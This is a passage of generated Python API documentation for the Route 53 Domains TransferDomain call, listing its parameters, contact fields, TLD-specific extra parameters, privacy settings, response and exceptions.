'Name': 'DUNS_NUMBER'|'BRAND_NUMBER'|'BIRTH_DEPARTMENT'|'BIRTH_DATE_IN_YYYY_MM_DD'|'BIRTH_COUNTRY'|'BIRTH_CITY'|'DOCUMENT_NUMBER'|'AU_ID_NUMBER'|'AU_ID_TYPE'|'CA_LEGAL_TYPE'|'CA_BUSINESS_ENTITY_TYPE'|'CA_LEGAL_REPRESENTATIVE'|'CA_LEGAL_REPRESENTATIVE_CAPACITY'|'ES_IDENTIFICATION'|'ES_IDENTIFICATION_TYPE'|'ES_LEGAL_FORM'|'FI_BUSINESS_NUMBER'|'FI_ID_NUMBER'|'FI_NATIONALITY'|'FI_ORGANIZATION_TYPE'|'IT_NATIONALITY'|'IT_PIN'|'IT_REGISTRANT_ENTITY_TYPE'|'RU_PASSPORT_DATA'|'SE_ID_NUMBER'|'SG_ID_NUMBER'|'VAT_NUMBER'|'UK_CONTACT_TYPE'|'UK_COMPANY_NUMBER',
'Value': 'string'
},
]
},
PrivacyProtectAdminContact=True|False,
PrivacyProtectRegistrantContact=True|False,
PrivacyProtectTechContact=True|False
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that you want to transfer to Route 53. The top-level domain (TLD), such as .com, must be a TLD that Route 53 supports. For a list of supported TLDs, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide .\nThe domain name can contain only the following characters:\n\nLetters a through z. Domain names are not case sensitive.\nNumbers 0 through 9.\nHyphen (-). You can\'t specify a hyphen at the beginning or end of a label.\nPeriod (.) to separate the labels in the name, such as the . in example.com .\n\n
:type IdnLangCode: string
:param IdnLangCode: Reserved for future use.
:type DurationInYears: integer
:param DurationInYears: [REQUIRED]\nThe number of years that you want to register the domain for. Domains are registered for a minimum of one year. The maximum period depends on the top-level domain.\nDefault: 1\n
:type Nameservers: list
:param Nameservers: Contains details for the host and glue IP addresses.\n\n(dict) --Nameserver includes the following elements.\n\nName (string) -- [REQUIRED]The fully qualified host name of the name server.\nConstraint: Maximum 255 characters\n\nGlueIps (list) --Glue IP address of a name server entry. Glue IP addresses are required only when the name of the name server is a subdomain of the domain. For example, if your domain is example.com and the name server for the domain is ns.example.com, you need to specify the IP address for ns.example.com.\nConstraints: The list can contain only one IPv4 and one IPv6 address.\n\n(string) --\n\n\n\n\n\n
:type AuthCode: string
:param AuthCode: The authorization code for the domain. You get this value from the current registrar.
:type AutoRenew: boolean
:param AutoRenew: Indicates whether the domain will be automatically renewed (true) or not (false). Autorenewal only takes effect after the account is charged.\nDefault: true\n
:type AdminContact: dict
:param AdminContact: [REQUIRED]\nProvides detailed contact information.\n\nFirstName (string) --First name of contact.\n\nLastName (string) --Last name of contact.\n\nContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:\n\nIf you specify a value other than PERSON , you must also specify a value for OrganizationName .\nFor some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide\nFor .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .\n\n\nOrganizationName (string) --Name of the organization for contact types other than PERSON .\n\nAddressLine1 (string) --First line of the contact\'s address.\n\nAddressLine2 (string) --Second line of contact\'s address, if any.\n\nCity (string) --The city of the contact\'s address.\n\nState (string) --The state or province of the contact\'s city.\n\nCountryCode (string) --Code for the country of the contact\'s address.\n\nZipCode (string) --The zip or postal code of the contact\'s address.\n\nPhoneNumber (string) --The phone number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code>]'. For example, a US phone number might appear as '+1.1234567890' .\n\nEmail (string) --Email address of the contact.\n\nFax (string) --Fax number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code]'. For example, a US phone number might appear as '+1.1234567890' .\n\nExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.\n\n(dict) --ExtraParam includes the following elements.\n\nName (string) -- [REQUIRED]The name of an additional parameter that is required by a top-level domain. 
Here are the top-level domains that require additional parameters and the names of the parameters that they require:\n\n.com.au and .net.au\n\nAU_ID_NUMBER\nAU_ID_TYPE Valid values include the following:\nABN (Australian business number)\nACN (Australian company number)\nTM (Trademark number)\n\n.ca\n\nBRAND_NUMBER\nCA_BUSINESS_ENTITY_TYPE Valid values include the following:\nBANK (Bank)\nCOMMERCIAL_COMPANY (Commercial company)\nCOMPANY (Company)\nCOOPERATION (Cooperation)\nCOOPERATIVE (Cooperative)\nCOOPRIX (Cooprix)\nCORP (Corporation)\nCREDIT_UNION (Credit union)\nFOMIA (Federation of mutual insurance associations)\nINC (Incorporated)\nLTD (Limited)\nLTEE (Limit\xc3\xa9e)\nLLC (Limited liability corporation)\nLLP (Limited liability partnership)\nLTE (Lte.)\nMBA (Mutual benefit association)\nMIC (Mutual insurance company)\nNFP (Not-for-profit corporation)\nSA (S.A.)\nSAVINGS_COMPANY (Savings company)\nSAVINGS_UNION (Savings union)\nSARL (Soci\xc3\xa9t\xc3\xa9 \xc3\xa0 responsabilit\xc3\xa9 limit\xc3\xa9e)\nTRUST (Trust)\nULC (Unlimited liability corporation)\n\n\nCA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:\nABO (Aboriginal Peoples indigenous to Canada)\nCCT (Canadian citizen)\nLGR (Legal Representative of a Canadian Citizen or Permanent Resident)\nRES (Permanent resident of Canada)\n\n\n\nWhen ContactType is a value other than PERSON , valid values include the following:\n\n\nASS (Canadian unincorporated association)\nCCO (Canadian corporation)\nEDU (Canadian educational institution)\nGOV (Government or government entity in Canada)\nHOP (Canadian Hospital)\nINB (Indian Band recognized by the Indian Act of Canada)\nLAM (Canadian Library, Archive, or Museum)\nMAJ (Her/His Majesty the Queen/King)\nOMK (Official mark registered in Canada)\nPLT (Canadian Political Party)\nPRT (Partnership Registered in Canada)\nTDM (Trademark registered in Canada)\nTRD (Canadian Trade Union)\nTRS (Trust established in Canada)\n\n.es\n\n\nES_IDENTIFICATION Specify the applicable value:\nFor contacts inside Spain: Enter your passport ID.\nFor contacts outside of Spain: Enter the VAT identification number for the company.\n\n\nNote\nFor .es domains, the value of ContactType must be PERSON .\n\n\nES_IDENTIFICATION_TYPE Valid values include the following:\nDNI_AND_NIF (For Spanish contacts)\nNIE (For foreigners with legal residence)\nOTHER (For contacts outside of Spain)\n\n\nES_LEGAL_FORM Valid values include the following:\nASSOCIATION\nCENTRAL_GOVERNMENT_BODY\nCIVIL_SOCIETY\nCOMMUNITY_OF_OWNERS\nCOMMUNITY_PROPERTY\nCONSULATE\nCOOPERATIVE\nDESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL\nECONOMIC_INTEREST_GROUP\nEMBASSY\nENTITY_MANAGING_NATURAL_AREAS\nFARM_PARTNERSHIP\nFOUNDATION\nGENERAL_AND_LIMITED_PARTNERSHIP\nGENERAL_PARTNERSHIP\nINDIVIDUAL\nLIMITED_COMPANY\nLOCAL_AUTHORITY\nLOCAL_PUBLIC_ENTITY\nMUTUAL_INSURANCE_COMPANY\nNATIONAL_PUBLIC_ENTITY\nORDER_OR_RELIGIOUS_INSTITUTION\nOTHERS (Only for contacts outside of Spain)\nPOLITICAL_PARTY\nPROFESSIONAL_ASSOCIATION\nPUBLIC_LAW_ASSOCIATION\nPUBLIC_LIMITED_COMPANY\nREGIONAL_GOVERNMENT_BODY\nREGIONAL_PUBLIC_ENTITY\nSAVINGS_BANK\nSPANISH_OFFICE\nSPORTS_ASSOCIATION\nSPORTS_FEDERATION\nSPORTS_LIMITED_COMPANY\nTEMPORARY_ALLIANCE_OF_ENTERPRISES\nTRADE_UNION\nWORKER_OWNED_COMPANY\nWORKER_OWNED_LIMITED_COMPANY\n\n.fi\n\nBIRTH_DATE_IN_YYYY_MM_DD\nFI_BUSINESS_NUMBER\nFI_ID_NUMBER\nFI_NATIONALITY Valid values include the following:\nFINNISH\nNOT_FINNISH\n\n\nFI_ORGANIZATION_TYPE Valid values include the 
following:\nCOMPANY\nCORPORATION\nGOVERNMENT\nINSTITUTION\nPOLITICAL_PARTY\nPUBLIC_COMMUNITY\nTOWNSHIP\n\n.fr\n\nBIRTH_CITY\nBIRTH_COUNTRY\nBIRTH_DATE_IN_YYYY_MM_DD\nBIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .\nBRAND_NUMBER.it\n\nIT_NATIONALITY\nIT_PIN\nIT_REGISTRANT_ENTITY_TYPE Valid values include the following:\nFOREIGNERS\nFREELANCE_WORKERS (Freelance workers and professionals)\nITALIAN_COMPANIES (Italian companies and one-person companies)\nNON_PROFIT_ORGANIZATIONS\nOTHER_SUBJECTS\nPUBLIC_ORGANIZATIONS\n\n.ru\n\nBIRTH_DATE_IN_YYYY_MM_DD\nRU_PASSPORT_DATA.se\n\nBIRTH_COUNTRY\nSE_ID_NUMBER.sg\n\nSG_ID_NUMBER.co.uk, .me.uk, and .org.uk\n\nUK_CONTACT_TYPE Valid values include the following:\nCRC (UK Corporation by Royal Charter)\nFCORP (Non-UK Corporation)\nFIND (Non-UK Individual, representing self)\nFOTHER (Non-UK Entity that does not fit into any other category)\nGOV (UK Government Body)\nIND (UK Individual (representing self))\nIP (UK Industrial/Provident Registered Company)\nLLP (UK Limited Liability Partnership)\nLTD (UK Limited Company)\nOTHER (UK Entity that does not fit into any other category)\nPLC (UK Public Limited Company)\nPTNR (UK Partnership)\nRCHAR (UK Registered Charity)\nSCH (UK School)\nSTAT (UK Statutory Body)\nSTRA (UK Sole Trader)\n\n\nUK_COMPANY_NUMBER\n\nIn addition, many TLDs require a VAT_NUMBER .\n\nValue (string) -- [REQUIRED]The value that corresponds with the name of an extra parameter.\n\n\n\n\n\n\n
:type RegistrantContact: dict
:param RegistrantContact: [REQUIRED]\nProvides detailed contact information.\n\nFirstName (string) --First name of contact.\n\nLastName (string) --Last name of contact.\n\nContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:\n\nIf you specify a value other than PERSON , you must also specify a value for OrganizationName .\nFor some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide\nFor .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .\n\n\nOrganizationName (string) --Name of the organization for contact types other than PERSON .\n\nAddressLine1 (string) --First line of the contact\'s address.\n\nAddressLine2 (string) --Second line of contact\'s address, if any.\n\nCity (string) --The city of the contact\'s address.\n\nState (string) --The state or province of the contact\'s city.\n\nCountryCode (string) --Code for the country of the contact\'s address.\n\nZipCode (string) --The zip or postal code of the contact\'s address.\n\nPhoneNumber (string) --The phone number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code>]'. For example, a US phone number might appear as '+1.1234567890' .\n\nEmail (string) --Email address of the contact.\n\nFax (string) --Fax number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code]'. For example, a US phone number might appear as '+1.1234567890' .\n\nExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.\n\n(dict) --ExtraParam includes the following elements.\n\nName (string) -- [REQUIRED]The name of an additional parameter that is required by a top-level domain. 
Here are the top-level domains that require additional parameters and the names of the parameters that they require:\n\n.com.au and .net.au\n\nAU_ID_NUMBER\nAU_ID_TYPE Valid values include the following:\nABN (Australian business number)\nACN (Australian company number)\nTM (Trademark number)\n\n.ca\n\nBRAND_NUMBER\nCA_BUSINESS_ENTITY_TYPE Valid values include the following:\nBANK (Bank)\nCOMMERCIAL_COMPANY (Commercial company)\nCOMPANY (Company)\nCOOPERATION (Cooperation)\nCOOPERATIVE (Cooperative)\nCOOPRIX (Cooprix)\nCORP (Corporation)\nCREDIT_UNION (Credit union)\nFOMIA (Federation of mutual insurance associations)\nINC (Incorporated)\nLTD (Limited)\nLTEE (Limit\xc3\xa9e)\nLLC (Limited liability corporation)\nLLP (Limited liability partnership)\nLTE (Lte.)\nMBA (Mutual benefit association)\nMIC (Mutual insurance company)\nNFP (Not-for-profit corporation)\nSA (S.A.)\nSAVINGS_COMPANY (Savings company)\nSAVINGS_UNION (Savings union)\nSARL (Soci\xc3\xa9t\xc3\xa9 \xc3\xa0 responsabilit\xc3\xa9 limit\xc3\xa9e)\nTRUST (Trust)\nULC (Unlimited liability corporation)\n\n\nCA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:\nABO (Aboriginal Peoples indigenous to Canada)\nCCT (Canadian citizen)\nLGR (Legal Representative of a Canadian Citizen or Permanent Resident)\nRES (Permanent resident of Canada)\n\n\n\nWhen ContactType is a value other than PERSON , valid values include the following:\n\n\nASS (Canadian unincorporated association)\nCCO (Canadian corporation)\nEDU (Canadian educational institution)\nGOV (Government or government entity in Canada)\nHOP (Canadian Hospital)\nINB (Indian Band recognized by the Indian Act of Canada)\nLAM (Canadian Library, Archive, or Museum)\nMAJ (Her/His Majesty the Queen/King)\nOMK (Official mark registered in Canada)\nPLT (Canadian Political Party)\nPRT (Partnership Registered in Canada)\nTDM (Trademark registered in Canada)\nTRD (Canadian Trade Union)\nTRS (Trust established in Canada)\n\n.es\n\n\nES_IDENTIFICATION Specify the applicable value:\nFor contacts inside Spain: Enter your passport ID.\nFor contacts outside of Spain: Enter the VAT identification number for the company.\n\n\nNote\nFor .es domains, the value of ContactType must be PERSON .\n\n\nES_IDENTIFICATION_TYPE Valid values include the following:\nDNI_AND_NIF (For Spanish contacts)\nNIE (For foreigners with legal residence)\nOTHER (For contacts outside of Spain)\n\n\nES_LEGAL_FORM Valid values include the following:\nASSOCIATION\nCENTRAL_GOVERNMENT_BODY\nCIVIL_SOCIETY\nCOMMUNITY_OF_OWNERS\nCOMMUNITY_PROPERTY\nCONSULATE\nCOOPERATIVE\nDESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL\nECONOMIC_INTEREST_GROUP\nEMBASSY\nENTITY_MANAGING_NATURAL_AREAS\nFARM_PARTNERSHIP\nFOUNDATION\nGENERAL_AND_LIMITED_PARTNERSHIP\nGENERAL_PARTNERSHIP\nINDIVIDUAL\nLIMITED_COMPANY\nLOCAL_AUTHORITY\nLOCAL_PUBLIC_ENTITY\nMUTUAL_INSURANCE_COMPANY\nNATIONAL_PUBLIC_ENTITY\nORDER_OR_RELIGIOUS_INSTITUTION\nOTHERS (Only for contacts outside of Spain)\nPOLITICAL_PARTY\nPROFESSIONAL_ASSOCIATION\nPUBLIC_LAW_ASSOCIATION\nPUBLIC_LIMITED_COMPANY\nREGIONAL_GOVERNMENT_BODY\nREGIONAL_PUBLIC_ENTITY\nSAVINGS_BANK\nSPANISH_OFFICE\nSPORTS_ASSOCIATION\nSPORTS_FEDERATION\nSPORTS_LIMITED_COMPANY\nTEMPORARY_ALLIANCE_OF_ENTERPRISES\nTRADE_UNION\nWORKER_OWNED_COMPANY\nWORKER_OWNED_LIMITED_COMPANY\n\n.fi\n\nBIRTH_DATE_IN_YYYY_MM_DD\nFI_BUSINESS_NUMBER\nFI_ID_NUMBER\nFI_NATIONALITY Valid values include the following:\nFINNISH\nNOT_FINNISH\n\n\nFI_ORGANIZATION_TYPE Valid values include the 
following:\nCOMPANY\nCORPORATION\nGOVERNMENT\nINSTITUTION\nPOLITICAL_PARTY\nPUBLIC_COMMUNITY\nTOWNSHIP\n\n.fr\n\nBIRTH_CITY\nBIRTH_COUNTRY\nBIRTH_DATE_IN_YYYY_MM_DD\nBIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .\nBRAND_NUMBER.it\n\nIT_NATIONALITY\nIT_PIN\nIT_REGISTRANT_ENTITY_TYPE Valid values include the following:\nFOREIGNERS\nFREELANCE_WORKERS (Freelance workers and professionals)\nITALIAN_COMPANIES (Italian companies and one-person companies)\nNON_PROFIT_ORGANIZATIONS\nOTHER_SUBJECTS\nPUBLIC_ORGANIZATIONS\n\n.ru\n\nBIRTH_DATE_IN_YYYY_MM_DD\nRU_PASSPORT_DATA.se\n\nBIRTH_COUNTRY\nSE_ID_NUMBER.sg\n\nSG_ID_NUMBER.co.uk, .me.uk, and .org.uk\n\nUK_CONTACT_TYPE Valid values include the following:\nCRC (UK Corporation by Royal Charter)\nFCORP (Non-UK Corporation)\nFIND (Non-UK Individual, representing self)\nFOTHER (Non-UK Entity that does not fit into any other category)\nGOV (UK Government Body)\nIND (UK Individual (representing self))\nIP (UK Industrial/Provident Registered Company)\nLLP (UK Limited Liability Partnership)\nLTD (UK Limited Company)\nOTHER (UK Entity that does not fit into any other category)\nPLC (UK Public Limited Company)\nPTNR (UK Partnership)\nRCHAR (UK Registered Charity)\nSCH (UK School)\nSTAT (UK Statutory Body)\nSTRA (UK Sole Trader)\n\n\nUK_COMPANY_NUMBER\n\nIn addition, many TLDs require a VAT_NUMBER .\n\nValue (string) -- [REQUIRED]The value that corresponds with the name of an extra parameter.\n\n\n\n\n\n\n
:type TechContact: dict
:param TechContact: [REQUIRED]\nProvides detailed contact information.\n\nFirstName (string) --First name of contact.\n\nLastName (string) --Last name of contact.\n\nContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:\n\nIf you specify a value other than PERSON , you must also specify a value for OrganizationName .\nFor some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide\nFor .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .\n\n\nOrganizationName (string) --Name of the organization for contact types other than PERSON .\n\nAddressLine1 (string) --First line of the contact\'s address.\n\nAddressLine2 (string) --Second line of contact\'s address, if any.\n\nCity (string) --The city of the contact\'s address.\n\nState (string) --The state or province of the contact\'s city.\n\nCountryCode (string) --Code for the country of the contact\'s address.\n\nZipCode (string) --The zip or postal code of the contact\'s address.\n\nPhoneNumber (string) --The phone number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code>]'. For example, a US phone number might appear as '+1.1234567890' .\n\nEmail (string) --Email address of the contact.\n\nFax (string) --Fax number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code]'. For example, a US phone number might appear as '+1.1234567890' .\n\nExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.\n\n(dict) --ExtraParam includes the following elements.\n\nName (string) -- [REQUIRED]The name of an additional parameter that is required by a top-level domain. 
Here are the top-level domains that require additional parameters and the names of the parameters that they require:\n\n.com.au and .net.au\n\nAU_ID_NUMBER\nAU_ID_TYPE Valid values include the following:\nABN (Australian business number)\nACN (Australian company number)\nTM (Trademark number)\n\n.ca\n\nBRAND_NUMBER\nCA_BUSINESS_ENTITY_TYPE Valid values include the following:\nBANK (Bank)\nCOMMERCIAL_COMPANY (Commercial company)\nCOMPANY (Company)\nCOOPERATION (Cooperation)\nCOOPERATIVE (Cooperative)\nCOOPRIX (Cooprix)\nCORP (Corporation)\nCREDIT_UNION (Credit union)\nFOMIA (Federation of mutual insurance associations)\nINC (Incorporated)\nLTD (Limited)\nLTEE (Limit\xc3\xa9e)\nLLC (Limited liability corporation)\nLLP (Limited liability partnership)\nLTE (Lte.)\nMBA (Mutual benefit association)\nMIC (Mutual insurance company)\nNFP (Not-for-profit corporation)\nSA (S.A.)\nSAVINGS_COMPANY (Savings company)\nSAVINGS_UNION (Savings union)\nSARL (Soci\xc3\xa9t\xc3\xa9 \xc3\xa0 responsabilit\xc3\xa9 limit\xc3\xa9e)\nTRUST (Trust)\nULC (Unlimited liability corporation)\n\n\nCA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:\nABO (Aboriginal Peoples indigenous to Canada)\nCCT (Canadian citizen)\nLGR (Legal Representative of a Canadian Citizen or Permanent Resident)\nRES (Permanent resident of Canada)\n\n\n\nWhen ContactType is a value other than PERSON , valid values include the following:\n\n\nASS (Canadian unincorporated association)\nCCO (Canadian corporation)\nEDU (Canadian educational institution)\nGOV (Government or government entity in Canada)\nHOP (Canadian Hospital)\nINB (Indian Band recognized by the Indian Act of Canada)\nLAM (Canadian Library, Archive, or Museum)\nMAJ (Her/His Majesty the Queen/King)\nOMK (Official mark registered in Canada)\nPLT (Canadian Political Party)\nPRT (Partnership Registered in Canada)\nTDM (Trademark registered in Canada)\nTRD (Canadian Trade Union)\nTRS (Trust established in Canada)\n\n.es\n\n\nES_IDENTIFICATION Specify the applicable value:\nFor contacts inside Spain: Enter your passport ID.\nFor contacts outside of Spain: Enter the VAT identification number for the company.\n\n\nNote\nFor .es domains, the value of ContactType must be PERSON .\n\n\nES_IDENTIFICATION_TYPE Valid values include the following:\nDNI_AND_NIF (For Spanish contacts)\nNIE (For foreigners with legal residence)\nOTHER (For contacts outside of Spain)\n\n\nES_LEGAL_FORM Valid values include the following:\nASSOCIATION\nCENTRAL_GOVERNMENT_BODY\nCIVIL_SOCIETY\nCOMMUNITY_OF_OWNERS\nCOMMUNITY_PROPERTY\nCONSULATE\nCOOPERATIVE\nDESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL\nECONOMIC_INTEREST_GROUP\nEMBASSY\nENTITY_MANAGING_NATURAL_AREAS\nFARM_PARTNERSHIP\nFOUNDATION\nGENERAL_AND_LIMITED_PARTNERSHIP\nGENERAL_PARTNERSHIP\nINDIVIDUAL\nLIMITED_COMPANY\nLOCAL_AUTHORITY\nLOCAL_PUBLIC_ENTITY\nMUTUAL_INSURANCE_COMPANY\nNATIONAL_PUBLIC_ENTITY\nORDER_OR_RELIGIOUS_INSTITUTION\nOTHERS (Only for contacts outside of Spain)\nPOLITICAL_PARTY\nPROFESSIONAL_ASSOCIATION\nPUBLIC_LAW_ASSOCIATION\nPUBLIC_LIMITED_COMPANY\nREGIONAL_GOVERNMENT_BODY\nREGIONAL_PUBLIC_ENTITY\nSAVINGS_BANK\nSPANISH_OFFICE\nSPORTS_ASSOCIATION\nSPORTS_FEDERATION\nSPORTS_LIMITED_COMPANY\nTEMPORARY_ALLIANCE_OF_ENTERPRISES\nTRADE_UNION\nWORKER_OWNED_COMPANY\nWORKER_OWNED_LIMITED_COMPANY\n\n.fi\n\nBIRTH_DATE_IN_YYYY_MM_DD\nFI_BUSINESS_NUMBER\nFI_ID_NUMBER\nFI_NATIONALITY Valid values include the following:\nFINNISH\nNOT_FINNISH\n\n\nFI_ORGANIZATION_TYPE Valid values include the 
following:\nCOMPANY\nCORPORATION\nGOVERNMENT\nINSTITUTION\nPOLITICAL_PARTY\nPUBLIC_COMMUNITY\nTOWNSHIP\n\n.fr\n\nBIRTH_CITY\nBIRTH_COUNTRY\nBIRTH_DATE_IN_YYYY_MM_DD\nBIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .\nBRAND_NUMBER.it\n\nIT_NATIONALITY\nIT_PIN\nIT_REGISTRANT_ENTITY_TYPE Valid values include the following:\nFOREIGNERS\nFREELANCE_WORKERS (Freelance workers and professionals)\nITALIAN_COMPANIES (Italian companies and one-person companies)\nNON_PROFIT_ORGANIZATIONS\nOTHER_SUBJECTS\nPUBLIC_ORGANIZATIONS\n\n.ru\n\nBIRTH_DATE_IN_YYYY_MM_DD\nRU_PASSPORT_DATA.se\n\nBIRTH_COUNTRY\nSE_ID_NUMBER.sg\n\nSG_ID_NUMBER.co.uk, .me.uk, and .org.uk\n\nUK_CONTACT_TYPE Valid values include the following:\nCRC (UK Corporation by Royal Charter)\nFCORP (Non-UK Corporation)\nFIND (Non-UK Individual, representing self)\nFOTHER (Non-UK Entity that does not fit into any other category)\nGOV (UK Government Body)\nIND (UK Individual (representing self))\nIP (UK Industrial/Provident Registered Company)\nLLP (UK Limited Liability Partnership)\nLTD (UK Limited Company)\nOTHER (UK Entity that does not fit into any other category)\nPLC (UK Public Limited Company)\nPTNR (UK Partnership)\nRCHAR (UK Registered Charity)\nSCH (UK School)\nSTAT (UK Statutory Body)\nSTRA (UK Sole Trader)\n\n\nUK_COMPANY_NUMBER\n\nIn addition, many TLDs require a VAT_NUMBER .\n\nValue (string) -- [REQUIRED]The value that corresponds with the name of an extra parameter.\n\n\n\n\n\n\n
:type PrivacyProtectAdminContact: boolean
:param PrivacyProtectAdminContact: Whether you want to conceal contact information from WHOIS queries. If you specify true , WHOIS ('who is') queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If you specify false , WHOIS queries return the information that you entered for the admin contact.\nDefault: true\n
:type PrivacyProtectRegistrantContact: boolean
:param PrivacyProtectRegistrantContact: Whether you want to conceal contact information from WHOIS queries. If you specify true , WHOIS ('who is') queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If you specify false , WHOIS queries return the information that you entered for the registrant contact (domain owner).\nDefault: true\n
:type PrivacyProtectTechContact: boolean
:param PrivacyProtectTechContact: Whether you want to conceal contact information from WHOIS queries. If you specify true , WHOIS ('who is') queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If you specify false , WHOIS queries return the information that you entered for the technical contact.\nDefault: true\n
:rtype: dict
Returns
Response Syntax
{
'OperationId': 'string'
}
Response Structure
(dict) --
The TransferDomain response includes the following element.
OperationId (string) --
Identifier for tracking the progress of the request. To query the operation status, use GetOperationDetail .
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
Route53Domains.Client.exceptions.DuplicateRequest
Route53Domains.Client.exceptions.TLDRulesViolation
Route53Domains.Client.exceptions.DomainLimitExceeded
Route53Domains.Client.exceptions.OperationLimitExceeded
:return: {
'OperationId': 'string'
}
:returns:
DomainName (string) -- [REQUIRED]
The name of the domain that you want to transfer to Route 53. The top-level domain (TLD), such as .com, must be a TLD that Route 53 supports. For a list of supported TLDs, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide .
The domain name can contain only the following characters:
Letters a through z. Domain names are not case sensitive.
Numbers 0 through 9.
Hyphen (-). You can\'t specify a hyphen at the beginning or end of a label.
Period (.) to separate the labels in the name, such as the . in example.com .
IdnLangCode (string) -- Reserved for future use.
DurationInYears (integer) -- [REQUIRED]
The number of years that you want to register the domain for. Domains are registered for a minimum of one year. The maximum period depends on the top-level domain.
Default: 1
Nameservers (list) -- Contains details for the host and glue IP addresses.
(dict) --Nameserver includes the following elements.
Name (string) -- [REQUIRED]The fully qualified host name of the name server.
Constraint: Maximum 255 characters
GlueIps (list) --Glue IP address of a name server entry. Glue IP addresses are required only when the name of the name server is a subdomain of the domain. For example, if your domain is example.com and the name server for the domain is ns.example.com, you need to specify the IP address for ns.example.com.
Constraints: The list can contain only one IPv4 and one IPv6 address.
(string) --
AuthCode (string) -- The authorization code for the domain. You get this value from the current registrar.
AutoRenew (boolean) -- Indicates whether the domain will be automatically renewed (true) or not (false). Autorenewal only takes effect after the account is charged.
Default: true
AdminContact (dict) -- [REQUIRED]
Provides detailed contact information.
FirstName (string) --First name of contact.
LastName (string) --Last name of contact.
ContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:
If you specify a value other than PERSON , you must also specify a value for OrganizationName .
For some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide
For .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .
OrganizationName (string) --Name of the organization for contact types other than PERSON .
AddressLine1 (string) --First line of the contact\'s address.
AddressLine2 (string) --Second line of contact\'s address, if any.
City (string) --The city of the contact\'s address.
State (string) --The state or province of the contact\'s city.
CountryCode (string) --Code for the country of the contact\'s address.
ZipCode (string) --The zip or postal code of the contact\'s address.
PhoneNumber (string) --The phone number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code]". For example, a US phone number might appear as "+1.1234567890" .
Email (string) --Email address of the contact.
Fax (string) --Fax number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code]". For example, a US phone number might appear as "+1.1234567890" .
ExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.
(dict) --ExtraParam includes the following elements.
Name (string) -- [REQUIRED]The name of an additional parameter that is required by a top-level domain. Here are the top-level domains that require additional parameters and the names of the parameters that they require:
.com.au and .net.au
AU_ID_NUMBER
AU_ID_TYPE Valid values include the following:
ABN (Australian business number)
ACN (Australian company number)
TM (Trademark number)
.ca
BRAND_NUMBER
CA_BUSINESS_ENTITY_TYPE Valid values include the following:
BANK (Bank)
COMMERCIAL_COMPANY (Commercial company)
COMPANY (Company)
COOPERATION (Cooperation)
COOPERATIVE (Cooperative)
COOPRIX (Cooprix)
CORP (Corporation)
CREDIT_UNION (Credit union)
FOMIA (Federation of mutual insurance associations)
INC (Incorporated)
LTD (Limited)
LTEE (Limitée)
LLC (Limited liability corporation)
LLP (Limited liability partnership)
LTE (Lte.)
MBA (Mutual benefit association)
MIC (Mutual insurance company)
NFP (Not-for-profit corporation)
SA (S.A.)
SAVINGS_COMPANY (Savings company)
SAVINGS_UNION (Savings union)
SARL (Société à responsabilité limitée)
TRUST (Trust)
ULC (Unlimited liability corporation)
CA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:
ABO (Aboriginal Peoples indigenous to Canada)
CCT (Canadian citizen)
LGR (Legal Representative of a Canadian Citizen or Permanent Resident)
RES (Permanent resident of Canada)
